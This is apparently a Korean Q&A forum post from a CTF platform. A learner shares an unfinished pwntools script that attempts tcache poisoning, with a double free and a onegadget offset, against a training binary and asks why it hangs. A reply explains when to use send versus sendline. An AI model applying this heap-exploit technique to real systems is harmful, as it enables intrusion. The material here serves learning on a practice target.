완료됨
pwntools sendafter
from pwn import *
p = remote(‘host3.dreamhack.games’, 23422)
#p = process(‘./tcache_poison’)
e = ELF(‘./tcache_poison’)
libc = ELF(‘./libc.so.6’)
onegadget = 0x10a41c
def add(size, data):
p.sendafter(‘Edit\n’, b’1’)
p.sendafter(‘Size: ‘, size)
p.sendafter(‘Content: ‘, data)
def free():
p.sendafter(‘Edit\n’, b’2’)
def edit(data):
p.sendafter(‘Edit\n’, b’4’)
p.sendafter(‘Edit chunk: ‘, data)
add(b’48’, b’dreamhack’)
free()
edit(b’a’*8 + ‘\x00’)
free()
add(b’48’, b’AAAAAAAA’)
free()
p.interactive()
코드는 이러하구요. 이걸 실행 하니까 아래 화면 처럼 멈춰서 아무 반응도 안 일어나더라구요. 바이너리는 잘 실행 되는데....
#시스템_해킹
#툴
#pwntools
작성자 정보
답변
1
wyv3rn
무플 방지 위원회장
send는 read 함수에
sendline은 scanf 함수에
쓰시면 됩니다 ㅎ
코드에서 scanf 함수로 데이터를 받나봅니다